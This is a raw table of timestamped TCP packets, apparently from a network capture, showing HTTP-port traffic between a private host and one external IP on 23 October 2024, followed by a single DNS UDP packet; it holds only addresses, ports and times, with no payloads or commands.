Oct 23, 2024 08:15:43.843410015 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.843583107 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.843811989 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.843864918 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.843913078 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.843914986 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.844022036 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.844069958 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.844106913 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.844172001 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.844253063 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.844269037 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.844293118 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.844305038 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.845127106 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.845233917 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.845288038 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.845304966 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.845335960 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.845376015 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.845387936 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.845427036 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.845473051 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.845519066 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.845534086 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.848205090 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.960752010 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.960804939 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.960822105 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.960882902 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.961303949 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.961374044 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.961389065 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.961441994 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.961441994 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.961469889 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.961487055 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.961503983 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.961519957 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.961568117 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.961568117 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.961644888 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.962294102 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.962326050 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.962342024 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.962368011 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.962457895 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.962475061 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.962516069 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.962516069 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:43.962935925 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.962990999 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.963006973 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:43.963330984 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.078383923 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.078411102 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.078603983 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.078872919 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.078885078 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.078943014 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.078952074 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079039097 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079056978 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079128981 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079164982 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.079164982 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.079452991 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079493046 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079612017 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079699039 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079715967 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.079735994 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.079735994 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.079791069 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.080154896 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.080166101 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.080229998 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.080245972 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.080276012 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.080276012 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.080383062 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.080398083 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.080414057 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.080477953 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.080996990 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.081022024 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.081945896 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.196461916 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.196491957 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.196507931 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.196569920 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.196592093 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.196592093 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.196675062 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.196691036 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.196890116 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.196922064 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.196922064 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.196942091 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.196958065 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197053909 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197316885 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.197385073 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197455883 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197562933 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197593927 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.197593927 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.197659016 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197673082 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197774887 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197788954 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197804928 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.197823048 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.197823048 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.198466063 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.198492050 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.199347973 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.237018108 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.237066031 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.237083912 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.237113953 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.237113953 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.314157009 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314207077 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314222097 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314243078 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.314338923 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314354897 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314481974 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314498901 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314515114 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.314515114 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.314603090 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314619064 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314851999 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314881086 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.314881086 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.314932108 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.314948082 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.315042973 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.315045118 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.315409899 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.315443039 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.315459013 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.315489054 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.315489054 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.315620899 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.315635920 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.316687107 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.354470968 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.354497910 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.354513884 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.354780912 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.431529045 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.431576014 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.431591988 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.431615114 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.431699038 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.431718111 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.431750059 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.431837082 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.431922913 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.431934118 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.431941032 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.432084084 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.432099104 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.432117939 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.432132006 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.432132006 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.432760954 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.432801008 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.432827950 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.432842970 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.432874918 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.432986975 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.433001995 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.433017969 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.433335066 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.471903086 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.471960068 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.471977949 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.472006083 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.472019911 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.472023010 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.472023010 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.472155094 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.549308062 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549326897 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549344063 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549408913 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.549441099 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549458981 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549474955 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549514055 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.549514055 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.549690008 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549704075 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549737930 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.549834967 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549851894 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549869061 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549900055 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.549967051 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.549983978 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.550003052 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.550035000 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.550035954 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.550714016 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.550731897 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.550749063 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.550892115 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.551345110 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.551536083 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.589384079 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.589409113 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.589427948 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.589445114 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.589534998 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.589534998 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.637155056 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.637172937 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.637187958 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.637259960 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.670916080 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.670932055 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.670948029 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671039104 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.671039104 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.671066046 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671081066 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671097994 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671365976 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671384096 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671401024 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671410084 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.671477079 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.671525955 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671542883 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671559095 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.671632051 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.672290087 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.672303915 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.672319889 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.672420025 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.672420025 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.672460079 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.672476053 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.672492027 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.672630072 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.707071066 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.707089901 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.707106113 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.707268000 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.754733086 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.754757881 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.754776955 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.754870892 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.788491011 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.788547039 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.788583994 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.788619041 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.788729906 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.788768053 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.788824081 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.788875103 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.788908005 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.788938999 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.788976908 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.788980007 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789033890 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789069891 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789074898 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.789153099 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.789199114 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789474010 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789547920 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.789572001 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789608955 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789696932 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789727926 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.789731979 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789768934 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789804935 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.789844036 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.789947033 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.790425062 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.824580908 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.824632883 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.824652910 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.824672937 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.824707031 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.824724913 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.872220039 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.872252941 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.872287035 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.872312069 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.872320890 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.872335911 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.906177044 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906241894 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.906259060 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906299114 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906335115 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906378984 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.906390905 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906444073 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906467915 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.906495094 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906529903 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906569004 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906591892 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.906661987 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.906867027 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.906975985 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.907008886 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.907063007 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.907080889 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.907099009 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.907111883 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:44.907131910 CEST	80	49980	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:44.907233953 CEST	49980	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:47.705466986 CEST	49981	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:47.710921049 CEST	80	49981	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:47.711031914 CEST	49981	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:47.711318016 CEST	49981	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:47.711342096 CEST	49981	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:47.716733932 CEST	80	49981	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:47.716805935 CEST	80	49981	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:48.833766937 CEST	80	49981	45.91.8.152	192.168.2.10
Oct 23, 2024 08:15:48.908087015 CEST	49981	80	192.168.2.10	45.91.8.152
Oct 23, 2024 08:15:49.619543076 CEST	49981	80	192.168.2.10	45.91.8.152

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 23, 2024 08:14:50.368208885 CEST	63989	53	192.168.2.10	1.1.1.1
